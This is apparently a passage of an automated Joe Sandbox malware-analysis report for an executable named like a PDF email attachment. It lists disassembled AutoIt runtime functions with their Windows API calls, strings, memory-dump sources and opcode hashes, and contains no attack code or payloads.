                                                                                                          APIs
                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 007D69A2
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D69B1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                          • Opcode ID: 42b60733733b9b77030a26f98ace343d9da88bdda4144879c16d36baae24c283
                                                                                                          • Instruction ID: 4a2c8f5b87a4505ca048534f32c7d89018e7be7eb774b114dbe438714ac4eaa8
                                                                                                          • Opcode Fuzzy Hash: 42b60733733b9b77030a26f98ace343d9da88bdda4144879c16d36baae24c283
                                                                                                          • Instruction Fuzzy Hash: 91118C71100208ABEB108E74DC65AEB37B9EB053B4F50872AF9A5972E0C779EC509B60
                                                                                                          Function 007B29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2A22
                                                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007B2A41
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                          • Opcode ID: b3644393d2a432e01e3b40765a24114430af58ae6fea7eac660e89d223054c52
                                                                                                          • Instruction ID: 40390da1b0d52f051a1cbb050505a4666b2a183e3c980502f171ee7ac579eb9a
                                                                                                          • Opcode Fuzzy Hash: b3644393d2a432e01e3b40765a24114430af58ae6fea7eac660e89d223054c52
                                                                                                          • Instruction Fuzzy Hash: 1911D332902114EBCB30EB98DC44BDA73B8AB85300F04C021EC55E7292D738AD0BC791
                                                                                                          Function 007C21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C222C
                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C2255
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$OpenOption
                                                                                                          • String ID: <local>
                                                                                                          • API String ID: 942729171-4266983199
                                                                                                          • Opcode ID: 3dde361041039c85eca08806b6a7a1fe87e90d9fa2f426a96398248dbf6d475d
                                                                                                          • Instruction ID: 18e97e29bc45440c908bc8dbba913f78cca310ac667549b210d51da2ec60ce12
                                                                                                          • Opcode Fuzzy Hash: 3dde361041039c85eca08806b6a7a1fe87e90d9fa2f426a96398248dbf6d475d
                                                                                                          • Instruction Fuzzy Hash: CD110270601225BADB248F118C84FFBFBACFF06361F10822EFA1586001D2785982D6F0
                                                                                                          Function 007A8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007A8E73
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 844645f8e55955a0e0643c79b50777ea67c23beabd2263bba9cf78b496fe8dfc
                                                                                                          • Instruction ID: c123dd4bb5dcc07500b7d66df6b5c3a095d953ad0e3f4f5fff359dbc7ad208b1
                                                                                                          • Opcode Fuzzy Hash: 844645f8e55955a0e0643c79b50777ea67c23beabd2263bba9cf78b496fe8dfc
                                                                                                          • Instruction Fuzzy Hash: 4B0180B1A05219EB8B18ABA4CC598FE7769EB46320B144619F821572E1DE395808C651
                                                                                                          Function 007A8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 007A8D6B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 2c573e8a3bd6f4e44cf2c39727fb5bf5723aee492f7c4e4f4dcf01aeda8f0dd6
                                                                                                          • Instruction ID: 3aa3ed2c012ccce596ba4cd0089e87d736d92745daffc8199082b9e6f9818d58
                                                                                                          • Opcode Fuzzy Hash: 2c573e8a3bd6f4e44cf2c39727fb5bf5723aee492f7c4e4f4dcf01aeda8f0dd6
                                                                                                          • Instruction Fuzzy Hash: D901B1B1B41108EBCB18EBA0CD5AEFE73A8DF56300F104129B802672E1DE5D5A0CD662
                                                                                                          Function 007A8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 007A8DEE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 372448540-1403004172
                                                                                                          • Opcode ID: 67acb87ce2dfb95404cfb890e2e91b99f17fca762be0c27ec007dcf4410f76f8
                                                                                                          • Instruction ID: 6f68a459379cf63df3449241dec5ffc42f19fe9c846e502e05a67c0d1c06dd8d
                                                                                                          • Opcode Fuzzy Hash: 67acb87ce2dfb95404cfb890e2e91b99f17fca762be0c27ec007dcf4410f76f8
                                                                                                          • Instruction Fuzzy Hash: 1201D4B1B41108F7CB14E6A4CD5AEFE77A8DB16300F108115BC01A72D1DA1D5E0CD272
                                                                                                          Function 007B4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName_wcscmp
                                                                                                          • String ID: #32770
                                                                                                          • API String ID: 2292705959-463685578
                                                                                                          • Opcode ID: 7209bb97a6a3ebe8c6808a4e4dc7c3eb8074676ca8161dbdcff690e87e10a904
                                                                                                          • Instruction ID: e64cf6a172ec52611d91adaad455068a1022066c1171ad9605b1795dcd2ccdab
                                                                                                          • Opcode Fuzzy Hash: 7209bb97a6a3ebe8c6808a4e4dc7c3eb8074676ca8161dbdcff690e87e10a904
                                                                                                          • Instruction Fuzzy Hash: 97E0D8326003286BE720ABA9AC49FE7FBACEB45B70F004067FD44D3151E9749A55CBE4
                                                                                                          Function 0078B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0078B314: _memset.LIBCMT ref: 0078B321
                                                                                                            • Part of subcall function 00770940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0078B2F0,?,?,?,0075100A), ref: 00770945
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B2F4
                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0075100A), ref: 0078B303
                                                                                                          Strings
                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B2FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                          • API String ID: 3158253471-631824599
                                                                                                          • Opcode ID: b521d2a6c7b536d4e8576bc8509c553c9dfa042682dff4920aec22df63c35411
                                                                                                          • Instruction ID: 27877948112ec439d548637cb973dc522c160bc6af5be3121dd0fa16b5cc5dbc
                                                                                                          • Opcode Fuzzy Hash: b521d2a6c7b536d4e8576bc8509c553c9dfa042682dff4920aec22df63c35411
                                                                                                          • Instruction Fuzzy Hash: C3E03970200701CBD720AF28E8082467BE8FF40314F00896DE846C6651E7BCA409CBA1
                                                                                                          Function 007A7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007A7C82
                                                                                                            • Part of subcall function 00773358: _doexit.LIBCMT ref: 00773362
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message_doexit
                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                          • Opcode ID: b5634c04ef736d113a4e98641d1b0dfdecd6d5a2f96266df752be75867ad171b
                                                                                                          • Instruction ID: 1426a6b1683f16fca3a281b632220a5687331452750f05ec8fa3977c17e5567f
                                                                                                          • Opcode Fuzzy Hash: b5634c04ef736d113a4e98641d1b0dfdecd6d5a2f96266df752be75867ad171b
                                                                                                          • Instruction Fuzzy Hash: FDD02B323C535872D11432B56C0BFCA3A488F05B92F108416FF0C995D349DD85C051F8
                                                                                                          Function 007D5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D596E
                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D5981
                                                                                                            • Part of subcall function 007B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 483e4a023c83e89c5c3e57c2bc0b7f811f480e7bf63e288b7c8e77aa2b566f3f
                                                                                                          • Instruction ID: f03a420b789413480af1563a8f02805c947b19c5a255bf91cf763d189226ee2c
                                                                                                          • Opcode Fuzzy Hash: 483e4a023c83e89c5c3e57c2bc0b7f811f480e7bf63e288b7c8e77aa2b566f3f
                                                                                                          • Instruction Fuzzy Hash: DFD0C935385311BAEAA4BB70AC1FFD66A24BB00B50F044826F35AAA1D0C9E89800C658
                                                                                                          Function 007D5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D59AE
                                                                                                          • PostMessageW.USER32(00000000), ref: 007D59B5
                                                                                                            • Part of subcall function 007B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 2eb27959e5a36b7244794719ead309c80473684da0ae5d5d06ee2c07815bd2ef
                                                                                                          • Instruction ID: cfe9c70c89f15376691e2f1c6b30cbb42f170e5594317c4c1de185abe193c568
                                                                                                          • Opcode Fuzzy Hash: 2eb27959e5a36b7244794719ead309c80473684da0ae5d5d06ee2c07815bd2ef
                                                                                                          • Instruction Fuzzy Hash: D5D0C931382311BAEAA4BB70AC0FFD66624BB04B50F044826F356EA1D0C9E8A800C658